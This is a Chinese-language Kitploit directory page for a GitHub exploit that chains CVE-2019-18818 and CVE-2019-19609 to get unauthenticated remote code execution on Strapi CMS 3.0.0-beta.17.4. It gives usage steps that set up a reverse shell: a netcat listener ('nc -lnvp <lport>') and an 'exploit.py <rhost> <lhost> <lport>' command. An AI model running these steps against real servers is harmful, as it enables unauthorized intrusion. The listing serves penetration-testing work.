Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-19609 — Strapi CMS 3.0.0-beta.17.4 - 未经身份验证的远程代码执行 (CVE-2019-18818, CVE-2019-19609) | Kitploit
工具/GitHubGitHub/glowbase/cve-2019-19609
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubglowbase/cve-2019-19609

CVE-2019-19609

Strapi CMS 3.0.0-beta.17.4 - 未经身份验证的远程代码执行 (CVE-2019-18818, CVE-2019-19609)

查看仓库
214年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Strapi CMS 漏洞利用

该漏洞利用针对 Strapi CMS 框架 3.0.0-beta-17.4 版本中的两个漏洞,允许未经身份验证的远程代码执行(RCE)。

 

漏洞

CVE-2019-18818

弱密码恢复机制导致忘记密码

CVSS: 9.8 - 严重

更多详情: https://nvd.nist.gov/vuln/detail/CVE-2019-18818

CVE-2019-19609

未正确中和 OS 命令中的特殊元素('OS 命令注入')

CVSS: 7.2 - 高危

更多详情: https://nvd.nist.gov/vuln/detail/CVE-2019-19609

 

使用方法:

在运行此漏洞利用之前,请在你下面选项中指定的 lport 上启动一个 netcat 监听器。

启动 netcat 监听器

root@kitploit:~
nc -lnvp <lport>

运行漏洞利用

root@kitploit:~
exploit.py <rhost> <lhost> <lport>
下载工具